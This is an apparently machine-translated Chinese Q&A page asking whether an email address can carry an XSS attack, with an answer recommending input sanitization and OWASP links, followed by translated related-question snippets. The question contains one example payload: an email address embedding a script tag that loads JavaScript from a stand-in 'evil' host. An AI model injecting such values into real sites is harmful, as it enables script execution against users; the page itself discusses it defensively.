程序员经验分享-hwhale

是否可以通过电子邮件地址进行 XSS 攻击?

2023-12-22

我想知道电子​​邮件地址是否可以用于XSS攻击。

假设有一个网站,人们可以在其中注册并提供他的电子邮件地址。如果有人想要攻击给定的网站,他或她可能会创建一个电子邮件地址,例如:

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com

然后使用该电子邮件地址攻击该网站。

电子邮件地址中是否允许引用或脚本标签?


您示例中的电子邮件地址似乎有效。唯一的角色是unusual是报价"——其余的均有效。

维基百科 http://en.wikipedia.org/wiki/Email_address#Syntax表明您指定的电子邮件地址有效。

您需要确保任意用户输入在渲染之前经过清理。

首先,您可能需要参考以下信息XSS https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 and 预防 https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet可以在OWASP https://www.owasp.org/.

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

security

email

Xss

emailformats

是否可以通过电子邮件地址进行 XSS 攻击? 的相关文章

  • 如果未使用“data-target”属性,Bootstrap 3.3.7 是否安全?

    有一个安全漏洞 https snyk io test npm bootstrap 3 3 7 tab issues关于 Bootstrap 3 3 7 它表示 该软件包的受影响版本很容易通过数据目标属性受到跨站点脚本 XSS 攻击 我想知道

  • 将 ical 附件的邮件消息的内容类型设置为“text/calendar; method=REQUEST”

    我正在尝试使用 App Engine 邮件 API 从 App Engine 发送 iCalendar 格式的 ics 文件 这在 GMail 中非常有效 但是 Outlook 无法识别该文件 我认为问题在于内容类型设置为 文本 日历 而不

  • Django-尝试使用 send_mail() 在 python shell 中发送电子邮件,但无法工作

    我正在尝试在 Django 项目中发送帐户激活链接 但它无法工作 所以我在 shell 中尝试了非常基本的 send mail 函数 看看它是否正在发送 在settin py中 AUTHENTICATION BACKENDS django

  • GSSAPI 中的 javax.naming.AuthenticationException

    我正在尝试使用 JAVA GSSAPI 执行 NTLM 绑定 我收到此错误 javax naming AuthenticationException GSSAPI 根异常是 javax security sasl SaslException

  • Django 1.7:如何使用 html/css 文件作为模板发送电子邮件

    从 Django 1 7 开始 可以send email 使用新参数 html message 不幸的是 没有关于如何使用它的全面指南 新手友好 或者至少我找不到它 我需要使发送的电子邮件变得漂亮 因此 我试图弄清楚如何将我的消息包含到 h

  • 电子邮件地址的名称部分中的单引号合法吗?

    例如 jon o 电子邮件受保护 cdn cgi l email protection Yes 乔恩 奥科 电子邮件受保护 cdn cgi l email protection是符合 RFC 5322 的有效电子邮件地址 来自维基百科上的电

  • 从其他域发送电子邮件而不是垃圾邮件

    这个问题问了一遍又一遍 仍然没有好的解决方案 当有人使用 php 发送电子邮件并将另一个域放在 from 中时 它最终会成为垃圾邮件 解决方案通常是 使用您的 发件人 并将您想要的域名放入 回复 中 将您的域列入主要邮件服务的白名单 第一个

  • Gmail API 获取邮件的限制

    据我了解 目前 google 的 API 每秒向其 API 提供 10 个请求 从他们的文档中 https developers google com gmail api v1 reference quota 而且对于舒适地处理邮件来说 它

  • 使用 utf-8 文件名发送 MIME 编码的电子邮件附件

    你好亲爱的人们 我花了三天时间在网上搜索答案 但没有找到任何答案 我发现了很多 几乎 的案例 但没有一个正是我正在寻找的 我能够获取希伯来语的主题和正文消息 但无法获取希伯来语的附加文件名 顺便说一句 我对 PHPMailer 等第三方程序

  • 在表单中重新填充密码字段会产生安全问题吗?

    我想知道当其他字段未验证时是否应该重新填充表单中的 屏蔽的 密码字段 我在网上看到过两种形式 重新填充屏蔽密码字段 清空密码字段 因此用户需要再次输入它 即使它是有效的 你的最佳实践是什么 重新填充密码字段是否表明存在安全漏洞 就可用性而言

  • 为什么 iframe 请求不发送 cookie?

    兄弟部门创建了一个 HTML 文件 该文件实际上是少数 iframe 的支架 每个 iframe 都会调用一个托管在 Web 服务器上的报告 其参数略有不同 调用的报告将向未经身份验证的用户显示登录表单 或向已经过身份验证的用户显示报告内容

  • 如何防止 Lotus Notes 用户转发或复制通过 System.Net.Mail 发送的邮件?

    我想使用 SMTP 客户端 uiing microsft net 以 C 作为编程语言发送电子邮件 但是对于通过SMTP客户端发送的电子邮件 我们是否可以添加 禁止转发 或 禁止复制 等安全功能 我不希望电子邮件的收件人转发或复制电子邮件的

  • 使用 Google App Engine 发送时的 Gmail 发送配额

    Gmail 规定每天 500 个收件人发送电子邮件的配额 如果您通过他们的 POP IMAP 界面发送 则配额仅为每天 100 个收件人 使用 Google 应用引擎在 Gmail 帐户上发送电子邮件的发送配额是多少 它会遵循 POP IM

  • 如何保护 RESTful Web 服务的安全?

    我必须实施安全RESTful Web 服务 https www ibm com developerworks webservices library ws restful 我已经使用谷歌做了一些研究 但我陷入困境 Options TLS H

  • 电子邮件 X 标头的最大大小

    我们正在考虑将一些元数据添加到电子邮件的 X 标头中 这些电子邮件供内部系统使用 并将托管在 Exchange 服务器上 我们可以在 X Header 中存储的数据量是否有最大大小 是否有任何我应该了解的限制 例如特殊字符 仅限美国 ASC

  • 我无法使用 Codeigniter 发送任何电子邮件

    我创建了一个控制器 并在控制器中做了一个测试函数来测试电子邮件是否发送 我检查了不同的电子邮件地址 但没有成功 这是我的代码示例 public function sendmail config protocol sendmail confi

  • 如何在 iOS 中的电子邮件的 HTML 正文中嵌入图像

    我正在尝试在从 iPad 发送的 HTML 电子邮件的正文中包含图像 这似乎是不可能的 我尝试过使用 CID 方法 但似乎在 iOS 中无法获取 设置附件的 CID 我也尝试过将图像嵌入src data image png base64 b

  • 如何用utf8发送邮件

    我想以 utf 8 编码发送此电子邮件的消息 我能为此做什么 include functions php name stripslashes POST name email trim POST email subject stripslas

  • 下订单时如何在 Magento 中触发电子邮件?

    我需要以下问题的解决方案 1 客户下订单 2 店主收到没有价格信息的电子邮件 例如装箱单 我需要编辑哪些文件 我读过很多帖子 但他们似乎没有提到文件路径 Thx 实现这一目标的两种可能方法 您可以为该类创建模型重写Mage Sales Mo

  • 避免滥用“添加好友”的最佳实践

    我有一个具有基本社交功能的 PHP CodeIgniter 网站 其中显然包含 添加朋友 链接 单击此链接时 会在后台进行 AJAX 调用 从而将与该链接关联的用户添加为登录用户的好友 此外 该链接会转换为 删除朋友 其作用与罐头上所说的一

随机推荐

  • 取消注册通过清单注册的广播接收器

    是否可以注销BroadcastReceiver已通过清单注册 另请告诉我是否可以忽略BroadcastReceiver 无需进行任何代码更改 因为这样BroadcastReceiver现在对我来说没有用了 谢谢 您可以使用以下代码禁用接收器

  • 如何通过代码注册一个Spring ApplicationListener实现?

    我有一个 Spring 的实现ApplicationListener 当它在上下文 xml 文件中声明为 bean 或如果我使用时 它工作正常并接收事件 Component注解 但是 如果我使用以下代码通过代码手动注册它 它不会接收事件Co

  • Java:println中的布尔值(布尔值?“打印真”:“打印假”)[重复]

    这个问题在这里已经有答案了 我遇到了这个语法 System out println boolean variable print true print false 这个带有两个点 的语法是什么 我在哪里可以找到相关信息 它只适用于布尔值还是

  • C、套接字:连接被拒绝错误

    我有一个数据采集模块 我想从中收集以太网端口的数据 我正在一步步到达那里 目前我只想connect从客户端到服务器 我使用 Beej 的指南来获取基本的 C 代码 但我不断收到此连接错误connect Connection refused

  • 以编程方式更改 WPF TextBox 中的验证规则

    我有一个如下定义的文本输入区域

  • 如何创建虚拟 Windows 驱动器

    我正在尝试创建一个 Windows 虚拟驱动器 如 c 来映射远程存储 主要目的是以用户清楚的方式做到这一点 因此 用户不会知道他正在从另一个站点写入 读取 我正在寻找可用的产品 我发现FUSE在Windows中不是一个选项 而WebDAV

  • 如何为 hadoop 2.0 编译/使用 mahout?

    最新版本的 Mahout 0 9 仅基于 hadoop 1 x 构建 mvn 干净安装 如何为 hadoop 2 0 x 编译 mahout 因为当我运行命令时 hadoop jar mahout examples 0 9 SNAPSHOT

  • 如何使用可变大小的缓冲区获取c类型结构中字段的值?

    import readboard import struct import ctypes as c def readbuffer data size struct unpack

  • 碰撞检测/从 ArrayList 中删除对象

    我目前正在尝试测试下落物体和盒子之间的碰撞 我了解基本的碰撞检测 但我的问题是我必须测试它是否有无限数量的下落物体 当这些对象 blossoms 被创建时 它们被存储在一个ArrayList中 ArrayList 处理画布上对象的绘制 使用

  • 通过ilasm更改可执行图标

    我有一个安装程序应用程序 其中嵌入了 resx 文件 其中包含一些信息 例如服务器名称 端口 密码等 我必须生成这个安装程序 这个过程是自动化的 并通过我们的网站完成 对于每个客户 这工作正常 我用ildasm用于反汇编程序并替换 resx

  • 来自浏览器的过时加密警告

    我已经启动了带有 Apache 2 4 和 SSL 的 Windows Server 当我连接时https www example com https www example com然后点击绿色锁 我有消息 您与网站的连接已使用过时的加密技

  • 使用 Python 将整个 JSON 转换为一个 SQLite 字段

    我有一个可能很简单的问题 我正在尝试从在线源中提取 JSON 并将其存储在 SQLite 表中 除了将数据存储在丰富的表中 对应于 JSON 中的许多字段 之外 我还想在每次拉取时将整个 JSON 转储到表中 该表看起来像 CREATE T

  • 实现接口的类列表

    有没有办法实现类似的东西 List

  • 在jquery中获取外部url的html

    如何使用 jquery 获取外部 URL 的 HTML 简短的回答是你不能 因为 AJAX 请求被限制在相同的 子 域和端口上 同源政策 https developer mozilla org En Same origin policy f

  • Robocopy 后,复制的目录和文件在目标驱动器上不可见

    我很高兴使用 robocopy 将我的计算机备份到外部 USB 驱动器 这很棒 因为它只复制已更改 更新 新的文件 我可以将外部驱动器带到任何机器上并查看它 就像它是计算机上的另一个驱动器一样 我最近购买了一个 750g 和另一个 1tb

  • CoreMotion 在后台状态更新

    借助最新 iOS 设备中的 M7 芯片 当用户使用 CMMotionActivityManager 从静止状态变为跑步 行走等时 可以通过编程方式获得通知 Stava 和 Runkeeper 都用过这个自动暂停 GPS 轮询 http gi

  • 如何从另一个页面控制viewPages页面

    我有一个ViewPager共 3 页listView在每个页面中 我想要动画listView以某种方式 当用户水平滑动下一页时 listView应该根据下一页的宽度来 即第一个项目应该完全推入 第二个应该是可见的一半 口渴应该是第二个可见的

  • 如何在 Material UI 5 中使用 useTheme?

    我刚刚开始使用 Material UI 5 0 4 带有styled components 我想访问组件中的主题 我在网上查了一下 看到useTheme 所以我检查了文档并found it https mui com styles adva

  • 自动实例化会话bean?

    我有一个会话 bean

  • 是否可以通过电子邮件地址进行 XSS 攻击?

    我想知道电子 邮件地址是否可以用于XSS攻击 假设有一个网站 人们可以在其中注册并提供他的电子邮件地址 如果有人想要攻击给定的网站 他或她可能会创建一个电子邮件地址 例如 stmpname com 然后使用该电子邮件地址攻击该网站 电子邮件

热门标签